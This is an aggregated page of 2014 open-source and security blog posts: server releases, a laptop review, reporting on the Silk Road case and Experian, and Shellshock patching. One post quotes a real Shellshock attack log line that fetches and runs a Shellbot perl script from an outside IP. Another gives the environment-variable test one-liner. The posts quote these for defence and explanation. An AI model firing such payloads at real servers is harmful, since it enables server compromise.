Two years ago, I took on the maintenance of thttpd, a web server written by Jef Poskanzer at ACME Labs [1].  The code hadn’t been updated in about 10 years and there were dozens of accumulated patches in the Gentoo tree, many of which addressed serious security issues.  I emailed upstream and was told the project was “done”, whatever that meant, so I was going to tree-clean it.  When I expressed my intentions on the upstream mailing list, I got a bunch of “please don’t!” from users.  So rather than maintain a ton of patches, I forked the code, rewrote the build system to use autotools, and applied all the patches.  I dubbed the fork sthttpd.  There was no particular meaning to the “s”.  Maybe “still kicking”?

I put a git repo up on my server [2], got a mailing list going [3], and set up bugzilla [4].  There hasn’t been much activity, but enough that it got noticed by someone who pushed it out to OpenBSD ports [5].

Today, I finally pushed out 2.27.0 after two years.  This release takes care of a couple of new security issues: I fixed the world-readable log problem, CVE-2013-0348 [6], and Vitezslav Cizek <vcizek@suse.com> from openSUSE fixed a possible DoS triggered by a specially crafted .htpasswd file. Bob Tennent added some code to send correct headers for .svgz content, and Jean-Philippe Ouellet did some code cleanup.  So it was time.

Web servers are not my style, but its tiny size and speed make it perfect for embedded systems, which are near and dear to my heart.  I also make sure it compiles on *BSD and on Linux with glibc, uClibc or musl.  Not bad for a codebase which is over 10 years old!  Kudos to Jef.



While I got along well with my Thinkpad T61 laptop, for quite some time I had been planning to get a new one. It wasn't an easy decision and I looked in detail at the models available over recent months. I finally decided to buy one of Lenovo's Thinkpad X1 Carbon laptops in its 2014 edition. The X1 Carbon was introduced in 2012, however a completely new variant, very different from the first one, was released in early 2014. It is distinguished from the other models by its type number, 20A7.

Judging from the first days of use, I think I made the right decision. I hadn't seen the device before I bought it, because shops rarely seem to keep it in stock. I assume this is due to the relatively high price.

I was a bit worried because Lenovo made some unusual decisions for the keyboard; however, having used it for a few days, I don't feel that it has any severe downsides. The most unusual thing about it is that it doesn't have normal F1-F12 keys; instead it has what Lenovo calls an adaptive keyboard: a touch-sensitive strip which can display different kinds of keys. The idea is that different applications can have their own set of special keys there. However, just letting it display the normal F-keys works well, and not having "real" keys there doesn't feel like a big disadvantage. Besides that, Lenovo removed the Caps Lock key and placed Pos1/End there, which is a bit unusual but also nothing I worried about. I also hadn't seen any pictures of the German keyboard before I bought the device. The ^/°-key is not where it used to be (small downside), but the </>/| key is where it belongs (big plus; many laptop vendors get that wrong).

Good things:
* Lightweight, Ultrabook, no unnecessary stuff like CD/DVD drive
* High resolution (2560x1440)
* Hardware is up-to-date (Haswell chipset)

Downsides:
* Due to the ultrabook / integrated design, no easy changing of battery, RAM or HD
* No SD card reader
* Some trouble getting used to the touchpad (however, there are lots of possibilities to configure it; I assume that'll get better as I play with it)

It used to be the case that people wrote docs on how to get all the hardware in a laptop running on Linux, which I did for my previous laptops. These days this usually boils down to "run a recent Linux distribution with the latest kernel and xorg packages and most things will be fine". However, I thought having a central place where I collect relevant information would be nice, so I created one again. As usual, I'm running Gentoo Linux.

For people who plan to run Linux without a dual boot it may be worth mentioning that there seem to be troublesome errors in earlier versions of the BIOS and the SSD firmware. You may want to update them before removing Windows. On my device they were already up-to-date.


New court documents released this week by the U.S. government in its case against the alleged ringleader of the Silk Road online black market and drug bazaar suggest that the feds may have some ‘splaining to do.

The login prompt and CAPTCHA from the Silk Road home page.
Prior to its disconnection last year, the Silk Road was reachable only via Tor, software that protects users’ anonymity by bouncing their traffic between different servers and encrypting the traffic at every step of the way. Tor also lets anyone run a Web server without revealing the server’s true Internet address to the site’s users, and this was the very technology that the Silk Road used to obscure its location.

Last month, the U.S. government released court records claiming that FBI investigators were able to divine the location of the hidden Silk Road servers because the community’s login page employed an anti-abuse CAPTCHA service that pulled content from the open Internet — thus leaking the site’s true Internet address.

But lawyers for alleged Silk Road captain Ross W. Ulbricht (a.k.a. the “Dread Pirate Roberts”) asked the court to compel prosecutors to prove their version of events.  And indeed, discovery documents reluctantly released by the government this week appear to poke serious holes in the FBI’s story.



For starters, the defense asked the government for the name of the software that FBI agents used to record evidence of the CAPTCHA traffic that allegedly leaked from the Silk Road servers. The government essentially responded (PDF) that it could not comply with that request because the FBI maintained no records of its own access, meaning that the only record of their activity is in the logs of the seized Silk Road servers.

The response that holds perhaps the most potential to damage the government’s claim comes in the form of a configuration file (PDF) taken from the seized servers. Nicholas Weaver, a researcher at the International Computer Science Institute (ICSI) and at the University of California, Berkeley, explains the potential significance:

“The IP address listed in that file — 62.75.246.20 — was the front-end server for the Silk Road,” Weaver said. “Apparently, Ulbricht had this split architecture, where the initial communication through Tor went to the front-end server, which in turn just did a normal fetch to the back-end server. It’s not clear why he set it up this way, but the document the government released in 70-6.pdf shows the rules for serving the Silk Road Web pages, and those rules are that all content – including the login CAPTCHA – gets served to the front end server but to nobody else. This suggests that the Web service specifically refuses all connections except from the local host and the front-end Web server.”

Translation: Those rules mean that the Silk Road server would deny any request from the Internet that wasn’t coming from the front-end server, and that includes the CAPTCHA.

“This configuration file was last modified on June 6, so on June 11 — when the FBI said they [saw this leaky CAPTCHA] activity — the FBI could not have seen the CAPTCHA by connecting to the server while not using Tor,” Weaver said. “You simply would not have been able to get the CAPTCHA that way, because the server would refuse all requests.”

The FBI claims that it found the Silk Road server by examining plain text Internet traffic to and from the Silk Road CAPTCHA, and that it visited the address using a regular browser and received the CAPTCHA page. But Weaver says the traffic logs from the Silk Road server (PDF) that also were released by the government this week tell a different story.

“The server logs which the FBI provides as evidence show that, no, what happened is the FBI didn’t see a leakage coming from that IP,” he said. “What happened is they contacted that IP directly and got a PHPMyAdmin configuration page.” See this PDF file for a look at that PHPMyAdmin page. Here is the PHPMyAdmin server configuration.

But this is hardly a satisfying answer to how the FBI investigators located the Silk Road servers. After all, if the FBI investigators contacted the PHPMyAdmin page directly, how did they know to do that in the first place?

“That’s still the $64,000 question,” Weaver said. “So both the CAPTCHA couldn’t leak in that configuration, and the IP the government visited wasn’t providing the CAPTCHA, but instead a PHPMyAdmin interface. Thus, the leaky CAPTCHA story is full of holes.”

Many in the Internet community have officially called baloney [that's a technical term] on the government’s claims, and these latest apparently contradictory revelations from the government are likely to fuel speculation that the government is trying to explain away some not-so-by-the-book investigative methods.

“I find it surprising that when given the chance to provide a cogent, on-the-record explanation for how they discovered the server, they instead produced a statement that has been shown inconsistent with reality, and that they knew would be inconsistent with reality,” Weaver said. “Let me tell you, those tin foil hats are looking more and more fashionable each day.”


The phpMyFAQ Team would like to announce the availability of phpMyFAQ 2.8.15, the “Oops, we did it again!” release. This release fixes the broken installation introduced with phpMyFAQ 2.8.14 and updates the Farsi translation.


A Florida man was sentenced today to 27 months in prison for trying to purchase Social Security numbers and other data from an identity theft service that pulled consumer records from a subsidiary of credit bureau Experian.

Ngo’s ID theft service superget.info
Derric Theoc, 36, pleaded guilty to attempting to purchase Social Security and bank account records on more than 100 Americans with the intent to open credit card accounts and file fraudulent tax returns in the victims’ names. According to prosecutors, Theoc had purchased numerous records from Superget.info, a now-defunct online identity theft service that was run by a Vietnamese individual named Hieu Minh Ngo.

Ngo was arrested in 2012 by U.S. Secret Service agents, after he was lured to Guam by an undercover investigator who’d proposed a business deal to expand Ngo’s personal consumer data stores. As part of a guilty plea, Ngo later admitted that he’d obtained personal information on consumers from a variety of data broker companies by posing as a private investigator based in the United States.

Among the biggest brokers that Ngo bought from was Court Ventures, a company that was acquired in March 2012 by Experian — one of the three major credit bureaus. Court records show that for almost ten months after Experian completed that acquisition, Ngo continued siphoning consumer data and paying for the information via cash wire transfers from a bank in Singapore.

After Ngo’s arrest, Secret Service investigators in early 2013 quietly assumed control over his identity theft service in the hopes of identifying and arresting at least some of his more than 1,000 paying customers.

Theoc is just the latest in a string of identity thieves to have been rounded up for attempting to purchase additional records after the service came under the government’s control. In May, I wrote about another big beneficiary of Ngo’s service: An identity theft ring of at least 32 people who were arrested last year for allegedly using the information to steal millions from more than 1,000 victims across the country.

In April, this publication featured a story about 28-year-old Dayton, Ohio resident Lance Ealy, whom the government alleges also used Ngo’s services to steal financial records used for tax return fraud.

In October 2013, KrebsOnSecurity broke the news that Experian’s subsidiary was a major contributor to Ngo’s identity theft service. In subsequent hearings on Capitol Hill, Experian executives assured lawmakers with the curious contradiction that the company knew who the victims were and that they’d be taken care of, but that there was no evidence that any consumers had actually been harmed as a result of Experian’s oversight. It remains unclear if Experian, Court Ventures or any other firm duped by Ngo will ever be made to fully and publicly account for the damage done here, although earlier this year several state attorneys general announced that they’d launched their own investigation into the matter.


The phpMyFAQ Team is pleased to announce phpMyFAQ 2.8.14, the “Happy Birthday, Bianca!” release. This release fixes an installation compatibility issue with MySQL 5.1 and MySQL 5.5 introduced with phpMyFAQ 2.8.13. We also fixed some minor issues.


Just a short update about the server that houses the podcast files.  University IT consolidation has created some unplanned changes, but I hope to have a new server spun up soon.  Also, curious to hear what all of you use for your home directory on the Internet.

File Info: 7Min, 3MB.

Ogg Link: https://archive.org/download/bsdtalk245/bsdtalk245.ogg


Since it happened every time with my master-slave setup that data from new probes did not show up, I am blogging it here for future reference.

Make sure that the Smokeping directory is writable for www-data.

root@orion:/var/lib# ls -la | grep smokeping
drwxrwxr-x  7 smokeping     www-data       4096 Sep 30 16:11 smokeping
Furthermore, make sure that the directories and the RRD files in them have the correct permissions. When Smokeping creates new RRDs, they have the wrong permissions!

root@orion:/var/lib/smokeping# ll
total 28
drwxrwxr-x  7 smokeping www-data 4096 Sep 30 16:11 ./
drwxr-xr-x 70 root      root     4096 Sep 30 11:56 ../
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:19 Bandwidth/
drwxrwxr-x  2 smokeping www-data 4096 Aug 11 13:45 MultiHost/
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:21 Other/
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:21 S/
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:20 __sortercache/
As soon as the permissions are correct, data starts showing up. As you can see, there is a *.slave_cache file, since one of the slaves is currently sending data. The file is owned by the Apache process because the master-slave communication uses the Smokeping CGI.

root@orion:/var/lib/smokeping/Bandwidth# ll
total 4076
drwxrwxr-x 2 smokeping www-data    4096 Sep 30 19:23 ./
drwxrwxr-x 7 smokeping www-data    4096 Sep 30 16:11 ../
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:23 Target~home.rrd
-rw-r--r-- 1 www-data  www-data      78 Sep 30 19:23 Target.home.slave_cache
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:23 Target.rrd
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:17 Target~sg.rrd
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:23 Target~us.rrd
I hope this helps.
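The fix described above can be scripted. This is a sketch that operates on a scratch directory so it can be run unprivileged; on the real host you would point SMOKEDIR at /var/lib/smokeping and additionally run chown -R smokeping:www-data on it (user and group names as in the listings above):

```shell
# On the server: SMOKEDIR=/var/lib/smokeping, plus
# chown -R smokeping:www-data "$SMOKEDIR" (needs root).
SMOKEDIR=$(mktemp -d)
mkdir -p "$SMOKEDIR/Bandwidth"
touch "$SMOKEDIR/Bandwidth/Target.rrd"

# Directories drwxrwxr-x and files -rw-rw-r--, matching the listings above,
# so the CGI running as www-data can create and update RRDs.
find "$SMOKEDIR" -type d -exec chmod 775 {} +
find "$SMOKEDIR" -type f -exec chmod 664 {} +
```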



Apple has released updates to insulate Mac OS X systems from the dangerous “Shellshock” bug, a pervasive vulnerability that is already being exploited in active attacks.

Patches are available via Software Update, or from the following links for OS X Mavericks, Mountain Lion, and Lion.

After installing the updates, Mac users can check to see whether the flaw has been truly fixed by taking the following steps:

* Open Terminal, which you can find in the Applications folder (under the Utilities subfolder on Mavericks) or via Spotlight search.

* Execute this command:
bash --version

* The version after applying this update will be:

OS X Mavericks:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin13)
OS X Mountain Lion:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin12)
OS X Lion:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin11)
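Beyond checking the version string, you can test the original Shellshock flaw (CVE-2014-6271) directly with the widely circulated one-liner:

```shell
# A patched bash prints only "this is a test"; a vulnerable bash also
# executes the command smuggled into the environment value and prints
# "vulnerable" first.
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
```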


Today was an interesting one that I probably won’t forget for a while. Sure, I will likely forget all the details, but the point of the day will remain in my head for a long time to come. Why? Simply put, it made me think about the power of positivity (which is not generally a topic that consumes much of my thought cycles).

I started out the day in the same way that I start out almost every other day—with a run. I had decided that I was going to go for a 15 km run instead of the typical 10 or 12, but that’s really irrelevant. Within the first few minutes, I passed an older woman (probably in her mid-to-late sixties), and I said “good morning.” She responded with “what a beautiful smile! You make sure to give that gift to everyone today.” I was really taken aback by her comment because it was rather uncommon in this day and age.

Her comment stuck with me for the rest of the run, and I thought about the power that it had. It cost her absolutely nothing to say those refreshing, kind words, and yet, the impact was huge! Not only did it make me feel good, but it had other positive qualities as well. It made me more consciously consider my interactions with so-called “strangers.” I can’t control any aspect of their lives, and I wouldn’t want to do so. However, a simple wave to them, or a “good morning” may make them feel a little more interconnected with humanity.

Not all that long after, I went to get a cup of coffee from a corner shop. The clerk asked if that would be all, and I said it was. He said “Have a good day.” I didn’t have to pay for it because apparently it was National Coffee Day. Interesting. The more interesting part, though, was when I was leaving the store. I held the door for a man, and he said “You, sir, are a gentleman and a scholar,” to which I responded “well, at least one of those.” He said “aren’t you going to tell me which one?” I said “nope, that takes the fun out of it.”

That brief interaction wasn’t anything special at all… or was it? Again, it embodied the interconnectedness of humanity. We didn’t know each other at all, yet we were able to carry on a short conversation, understand one another’s humour, and, in our own ways, thank each other. He thanked me for a small gesture of politeness, and I thanked him for acknowledging it. All too often those types of gestures go without so much as a “thank you.” All too often, these types of gestures get neglected and never even happen.

What’s my point here? Positivity is infectious and in a great way! Whenever you’re thinking that the things you do and say don’t matter, think again. Just treating the people with whom you come in contact many, many times each day with a little respect can positively change the course of their day. A smile, saying hello, casually asking them how they’re doing, holding a door, helping someone pick up something that they’ve dropped, or any other positive interaction should be pursued (even if it is a little inconvenient for you). Don’t underestimate the power of positivity, and you may just help someone feel better. What’s more important than that? That’s not a rhetorical question; the answer is “nothing.”

Cheers,
Zach


“Please note that [COMPANY NAME] takes the security of your personal data very seriously.” If you’ve been on the Internet for any length of time, chances are very good that you’ve received at least one breach notification email or letter that includes some version of this obligatory line. But as far as lines go, this one is about as convincing as the classic break-up line, “It’s not you, it’s me.”



I was reminded of the sheer emptiness of this corporate breach-speak approximately two weeks ago, after receiving a snail mail letter from my Internet service provider — Cox Communications. In its letter, the company explained:

“On or about Aug. 13, 2014, we learned that one of our customer service representatives had her account credentials compromised by an unknown individual. This incident allowed the unauthorized person to view personal information associated with a small number of Cox accounts. The information which could have been viewed included your name, address, email address, your Secret Question/Answer, PIN and in some cases, the last four digits only of your Social Security number or drivers’ license number.”

The letter ended with the textbook offer of free credit monitoring services (through Experian, no less), and the obligatory “Please note that Cox takes the security of your personal data very seriously.” But I wondered how seriously they really take it. So, I called the number on the back of the letter, and was directed to Stephen Boggs, director of public affairs at Cox.

Boggs said that the trouble started after a female customer account representative was “socially engineered” or tricked into giving away her account credentials to a caller posing as a Cox tech support staffer. Boggs informed me that I was one of just 52 customers whose information the attacker(s) looked up after hijacking the customer service rep’s account.

The nature of the attack described by Boggs suggested two things: 1) That the login page that Cox employees use to access customer information is available on the larger Internet (i.e., it is not an internal-only application); and that 2) the customer support representative was able to access that public portal with nothing more than a username and a password.

Boggs either did not want to answer or did not know the answer to my main question: Were Cox customer support employees required to use multi-factor or two-factor authentication to access their accounts? Boggs promised to call back with a definitive response. To Cox’s credit, he did call back a few hours later, and confirmed my suspicions.

“We do use multifactor authentication in various cases,” Boggs said. “However, in this situation there was not two-factor authentication. We are taking steps based on our investigation to close this gap, as well as to conduct re-training of our customer service representatives to close that loop as well.”

This sad state of affairs is likely the same across multiple companies that claim to be protecting your personal and financial data. In my opinion, any company — particularly one in the ISP business — that isn’t using more than a username and a password to protect their customers’ personal information should be publicly shamed.

Unfortunately, most companies will not proactively take steps to safeguard this information until they are forced to do so — usually in response to a data breach.  Barring any pressure from Congress to find proactive ways to avoid breaches like this one, companies will continue to guarantee the security and privacy of their customers’ records, one breach at a time.


The Return of the IPJ Security-Planet.de | 2014-09-29 19:17 UTC

The Internet Protocol Journal was one of the best publications in the networking sector, so I was quite disappointed when it was discontinued last year. All the more pleasing that the IPJ has been relaunched with new sponsors; my copy arrived in my mailbox over the weekend.
The new website does not yet say how the print edition can be subscribed to. The online version can, as before, be downloaded online.
The main topics of the current issue are

  • Gigabit Wi-Fi
  • A Question of DNS Protocols


PostgreSQL Ebuilds Unified titanofold | 2014-09-29 18:21 UTC

I’ve finished making the move to unified PostgreSQL ebuilds in my overlay. Please give it a go and report any problems there.

Also, I know the comments are disabled. I have 27,186 comments to moderate. All of them are spam. I don’t want to deal with it.

(See my previous post on the topic for why.)


Bye bye Feedburner some useful things | 2014-09-29 14:26 UTC

Since using Feedburner no longer brings me any added value, I have switched the feeds back to the original WordPress feeds. The RSS feed address is now: https://nodomain.cc/feed

Please update your feed readers!



If you have any interest in IT security you have probably heard of Shellshock, a vulnerability in the command line shell Bash. Whenever serious vulnerabilities are found in such a widely used piece of software, it's inevitable that there will be some impact. Machines get owned and abused to send spam, DDoS other people or spread malware. However, I feel a lot of the scale of the impact is due to the fact that far too many people run infrastructure on the Internet in an irresponsible way.

After Shellshock hit the news it didn't take long for the first malicious attacks to appear in people's webserver logs - besides some scans that were done by researchers. On Saturday I had a look at a few such log entries, from my own servers and from what other people posted on some forums. This was one of them:

0.0.0.0 - - [26/Sep/2014:17:19:07 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 12241 "-" "() { :;}; /bin/bash -c \"cd /var/tmp;wget http://213.5.67.223/jurat;curl -O /var/tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

Note the time: this was on Friday afternoon, 5 pm (CET timezone). What's happening here is that someone is running an HTTP request where the user agent string, which usually contains the name of the software (e.g. the browser), is set to some malicious code meant to exploit the Bash vulnerability. If successful, it would download a malware script called jurat and execute it. We had obviously already upgraded our Bash installation, so this didn't do anything on our servers. The file jurat contains a perl script which is a malware called IRCbot.a or Shellbot.B.
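To see whether your own servers received similar probes, you can grep access logs for the characteristic "() { :;};" marker. A sketch using a scratch file seeded with the sample entry above; in practice you would point the grep at your real log, e.g. /var/log/apache2/access.log (the path depends on your webserver):

```shell
# Write the sample log line to a scratch file, then count matching probes.
LOG=$(mktemp)
cat > "$LOG" <<'EOF'
0.0.0.0 - - [26/Sep/2014:17:19:07 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 12241 "-" "() { :;}; /bin/bash -c \"cd /var/tmp;wget http://213.5.67.223/jurat\""
EOF
# -F: fixed-string match, so the shell metacharacters need no escaping.
grep -cF '() { :;};' "$LOG"
```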

For all such logs I checked whether the downloads were still available. Most of them were offline; however, the one presented here was still there. I checked the IP: it belongs to a Dutch company called AltusHost. Most likely one of their servers got hacked and someone placed the malware there.

I tried to contact AltusHost in different ways. I tweeted at them. I tried their live support chat. I could chat with somebody who asked me if I was a customer. He told me that if I wanted to report abuse, he couldn't help me; I should write an email to their abuse department. I asked him if he couldn't just tell them himself. He said that wasn't possible. I wrote an email to their abuse department. Nothing happened.

At noon on Sunday the malware was still online. When I checked again late on Sunday evening, it was gone.

Don't get me wrong: Things like this happen. I run servers myself. You cannot protect your infrastructure from any imaginable threat. You can greatly reduce the risk and we try a lot to do that, but there are things you can't prevent. Your customers will do things that are out of your control and sometimes security issues arise faster than you can patch them. However, what you can and absolutely must do is having a reasonable crisis management.

When one of the servers in your responsibility is part of a large-scale attack based on a threat that's a headline in all the news, I can't even imagine what it takes not to notice for almost two days. I don't believe I was the only one trying to get their attention. The speed at which you take action in such a situation makes the difference between hundreds and millions of infected hosts. Having your hosts deploy malware for that long is the kind of thing that makes the Internet a less secure place for everyone. Companies like AltusHost are helping malware authors. Not directly, but through their inaction.



Photo credit: Liam Quinn
This is going to be interesting as Planet Gentoo is currently unavailable as I write this. I'll try to send this out further so that people know about it.

By now we have all been doing our best to update our laptops and servers to the new bash version so that we are safe from the big scare of the quarter, shellshock. I say laptop because the way the vulnerability can be exploited limits the impact considerably if you have a desktop or otherwise connect only to trusted networks.

What remains to be done is to figure out how to avoid a repeat of this. And that's a difficult topic, because a 25-year-old bug is not easy to avoid, especially because there are probably plenty of siblings of it around that we have not found yet, just like this last week. But there are things that we can do as a whole environment to reduce the chances of problems like this happening, or at least keep them from escalating so quickly.

In this post I want to look into some things that Gentoo and its developers can do to make things better.

The first obvious thing is to figure out why /bin/sh for Gentoo is not dash or any other very limited shell such as BusyBox. The main answer lies in the init scripts that still use bashisms; this is not news, as I pushed for that four years ago, while Roy insisted on it even before that. Interestingly enough, though, this excuse is getting less and less relevant thanks to systemd. It is indeed one of the things I find genuinely good in Lennart's design: we want declarative init systems, not imperative ones. Unfortunately, even systemd is not as declarative as it was originally supposed to be, so the init script problem is only half solved — on the other hand, it does make things much easier, as you have to start afresh anyway.

If either all your init scripts are non-bash-requiring or you're using systemd (like me on the laptops), then it's mostly safe to switch to use dash as the provider for /bin/sh:

# emerge eselect-sh
# eselect sh set dash
That will change your /bin/sh and make it much less likely that you'd be vulnerable to this particular problem. Unfortunately, as I said, it's only mostly safe. I even found that some of the init scripts I wrote, which I had checked with checkbashisms, did not work as intended with dash; fixes are on their way. I also found that the lsb_release command, while not requiring bash itself, uses non-POSIX features, resulting in garbage on the output — this breaks facter-2 but not facter-1, as I found out when it broke my Puppet setup.
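A small illustration of the kind of bashism that slips past casual review (the script is a made-up example): the [[ ]] test is a bash extension, not POSIX sh, so bash accepts it while dash rejects it at runtime:

```shell
# A construct that works in bash but is not POSIX sh.
cat > /tmp/bashism-demo.sh <<'EOF'
#!/bin/sh
var="hello world"
if [[ $var == hello* ]]; then echo match; fi
EOF

bash /tmp/bashism-demo.sh    # bash is happy and prints: match
# Under dash the same script complains "[[: not found" on stderr instead;
# checkbashisms flags this one, but not every bashism is caught.
```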

Interestingly it would be simpler for me to use zsh, as then both the init script and lsb_release would have worked. Unfortunately when I tried doing that, Emacs tramp-mode froze when trying to open files, both with sshx and sudo modes. The same was true for using BusyBox, so I decided to just install dash everywhere and use that.

Unfortunately that does not mean you'll be perfectly safe, or that you can remove bash from your system. In Gentoo especially, we have too many dependencies on it, the first being Portage of course, but eselect qualifies as well. Of the two I'm actually more concerned about eselect: I have been saying this from the start, but designing such a major piece of software – one that does not change that often – in bash sounds like insanity. I still think that is the case.

I think this is the main problem: in Gentoo especially, bash has always been treated as a programming language. That's bad. Not only because it has a single reference implementation, but because it seems to convince other people, new to coding, that this is good engineering practice. It is not. If you need to build something like eselect, you do it in Python, or Perl, or C, but not bash!

Gentoo is currently stagnating, and that's hard to deny. I've stopped being active since I finally accepted stable employment – I'm almost thirty, it was time to stop playing around; I needed to make a living, even if I don't really make a life – and QA has obviously taken a step back (I still have a non-working dev-python/imaging on my laptop). So trying to push for getting rid of bash in Gentoo altogether is not realistic. On the other hand, even though it's probably going to be too late to be relevant, I'll push for a Summer of Code project next year to convert eselect to Python, or something along those lines.

As for myself, I decided that the bashisms in the init scripts I rely upon on my servers are simple enough that dash will work, so I pushed that change through Puppet to all my servers. It should be enough for the moment. I expect more scrutiny to be directed at dash, zsh, ksh and the other shells in the next few months, as people migrate around or decide that a 25-year-old bug is reason enough to think twice about all of them, so I'll keep my options open.

This is actually why I like software biodiversity: it gives you alternatives to fall back on when one component fails, and that is what worries me the most about systemd right now. I also hope that showing how badly bash has fared all this time under its closed development will make it possible to build a better syntax-compatible shell with a proper parser, better still with a properly librarised implementation. But that's probably hoping for too much.


The third BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.


A Legal Battle with a Ghost My Universe | 2014-09-28 06:59 UTC

Updating to the latest Ghost release, 0.5.2, holds a few pitfalls — my own installation guide does not cover some of the newly introduced difficulties, most of which arise from the fact that, on my systems, the ghost has to do its duty under FreeBSD.

The first hurdle was an endless list of error messages thrown by an innocuous npm install --production. Although my Ghost instance is configured to use PostgreSQL, it now forces a build of the SQLite modules, whose dependencies were of course not installed — a problem that seemed easy enough to fix:

pkg update && pkg upgrade  
pkg ins sqlite3 py27-sqlite3  
That changed the shape of the error messages, but it did not banish them. Digging deeper through the error logs and various JSON and JavaScript files, I found that the path to the Python interpreter must have been hard-wired somewhere, so the PYTHON environment variable never came into play and was simply ignored.

The solution is quite simple — a symlink does the trick (even if it is not very elegant):

cd /usr/local/bin  
ln -s python2 python  
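As a less invasive alternative to the global symlink, npm can be pointed at the right interpreter directly; node-gyp honors npm's python setting, so something along these lines should also work (the path is an assumption based on the FreeBSD ports layout):

```shell
# Tell npm/node-gyp which Python to use, instead of symlinking:
npm config set python /usr/local/bin/python2
# or only for this one installation run:
npm install --production --python=/usr/local/bin/python2
```

Whether this helps depends on whether the offending module actually goes through node-gyp rather than hard-coding the path itself, which is what the error logs suggested in my case.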
After that, all the dependencies built without complaint, and Ghost could be started manually (via npm start or node index.js) without further ado. But this is where the really fun part began: Supervisor could not persuade Ghost to stop terminating itself immediately, which led to log entries as odd as these:

2014-09-27 15:06:42,973 INFO spawned: 'ghost' with pid 40876  
2014-09-27 15:06:43,027 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:44,092 INFO spawned: 'ghost' with pid 40877  
2014-09-27 15:06:44,146 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:46,240 INFO spawned: 'ghost' with pid 40879  
2014-09-27 15:06:46,295 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:49,600 INFO spawned: 'ghost' with pid 40883  
2014-09-27 15:06:49,655 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:50,678 INFO gave up: ghost entered FATAL state, too many start retries too quickly  
So the Ghost process promptly exited again with status 0. Yes, you read that correctly: Ghost keels over, yet reports a normal shutdown. And since Ghost started and ran fine from the command line, I naturally put the blame on supervisord — in vain, as I had to concede afterwards.

It was the unruly ghost itself that was (once again) disobeying its process supervisor. With no clear cause for this behaviour, the only recourse was analysing the log files (of limited help) and the source code. The culprit turned out to be the permissions on the content directory of the Ghost installation.

While the data and images subdirectories have always required write access for Ghost, apps and themes were a different matter — in my setup, the latter in particular was read-only, since I wanted to give the still rather immature Ghost as little opportunity as possible to cause persistent damage through an exploitable security hole (such as smuggling malicious JavaScript into the theme).

Ghost's odd behaviour can be silenced temporarily by granting it the permissions it wants — but as with a defiant child, giving in is perhaps not the best idea. I have therefore opened a discussion topic on the Ghost forum, in the hope that in one of the next releases Ghost will quietly accept that it is not allowed to scribble all over the disk.
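For reference, the restrictive layout described above can be sketched like this (the install path and the ghost user/group are assumptions from a typical setup, not the exact configuration):

```shell
# Ghost genuinely needs write access only to data and images:
chown -R ghost:ghost /usr/local/www/ghost/content/data \
                     /usr/local/www/ghost/content/images
# Keep apps and themes read-only for the ghost user, so an exploited
# process cannot persist malicious JavaScript into the theme:
chown -R root:wheel /usr/local/www/ghost/content/apps \
                    /usr/local/www/ghost/content/themes
chmod -R a+rX,go-w  /usr/local/www/ghost/content/apps \
                    /usr/local/www/ghost/content/themes
```

With current Ghost releases this layout triggers the silent exit described above, which is exactly the behaviour the forum topic asks to change.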


I’ve been blogging about my non-Gentoo work on my Drupal site at http://opensource.dyc.edu/ but since I may be losing that server sometime in the future, I’m going to start duplicating those posts here. This work should be of interest to readers of Planet Gentoo because it draws a lot from Gentoo, but it doesn’t exactly fall under the category of a “Gentoo Project.”

Anyhow, today I’m releasing tor-ramdisk 20140925.  As you may recall from a previous post, tor-ramdisk is a uClibc-based micro Linux distribution I maintain whose only purpose is to host a Tor server in an environment that maximizes security and privacy.  Security is enhanced using Gentoo’s hardened toolchain and kernel, while privacy is enhanced by forcing logging to be off at all levels.  Also, tor-ramdisk runs in RAM, so no information survives a reboot, except for the configuration file and the private RSA key, which may be exported/imported by FTP or SCP.

A few days ago, the Tor team released 0.2.4.24 with one major bug fix according to their ChangeLog. Clients were apparently sending the wrong address for their chosen rendezvous points for hidden services, which sounds like it shouldn’t work, but it did because they also sent the identity digest. This fix should improve surfing of hidden services. The other minor changes involved updating geoip information and the address of a v3 directory authority, gabelmoo.

I took this opportunity to also update busybox to version 1.22.1, openssl to 1.0.1i, and the kernel to 3.16.3 + Gentoo’s hardened-patches-3.16.3-1.extras. Both the x86 and x86_64 images were tested using node “simba” and showed no issues.

You can get tor-ramdisk from the following urls (at least for now!)

i686:
Homepage: http://opensource.dyc.edu/tor-ramdisk
Download: http://opensource.dyc.edu/tor-ramdisk-downloads

x86_64:
Homepage: http://opensource.dyc.edu/tor-x86_64-ramdisk
Download: http://opensource.dyc.edu/tor-x86_64-ramdisk-downloads




Photo credit: Images_of_Money
Photo credit: Images_of_Money
Almost exactly 18 months after moving to Ireland, I'm finally about to receive my first Irish credit card. This took longer than I was expecting, but at least it should cover a few of my needs, even though it's not exactly my perfect plan either. But I guess it's better to start from the top.

First of all, I already have credit cards: Italian ones which, as I wrote before, are not chip'n'pin, and that causes a major headache in countries such as Ireland (and the UK too), where cards without chip'n'pin are not really well supported or understood. This means they are not viable, even though I have been using them for years and have enough credit history with them that they carry a higher limit than the norm, which is especially handy when dealing with things like expensive hotels when I'm on vacation.

